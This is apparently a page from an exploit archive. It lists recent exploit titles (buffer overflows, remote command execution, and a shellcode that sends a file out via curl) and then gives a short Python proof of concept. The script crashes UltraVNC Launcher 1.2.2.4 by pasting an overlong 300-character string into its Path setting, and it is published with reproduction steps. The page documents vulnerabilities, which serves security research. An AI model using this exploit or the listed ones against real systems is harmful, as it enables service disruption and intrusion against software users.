
13 changes to exploits/shellcodes UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC) UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC) MailCarrier 2.51 - 'RCPT TO' Buffer Overflow RemoteMouse 3.008 - Arbitrary Remote Command Execution CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) MailCarrier 2.51 - POP3 'USER' Buffer Overflow MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit) Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation DirectAdmin 1.561 - Multiple Vulnerabilities Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes) Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)
22 lines
No EOL
691 B
Python
Executable file
22 lines
No EOL
691 B
Python
Executable file
#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-04-14
|
|
#Vendor Homepage: https://www.uvnc.com/
|
|
#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
|
|
#Tested Version: 1.2.2.4
|
|
#Tested on: Windows 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
|
|
#2.- Open UltraLauncher.txt and copy content to clipboard
|
|
#3.- Open UltraVNC Launcher
|
|
#4.- Select "Properties"
|
|
#5.- In "Path vncviewer.exe" Paste Clipboard
|
|
#6.- Click on "OK"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 300
|
|
|
|
f = open('UltraLauncher.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |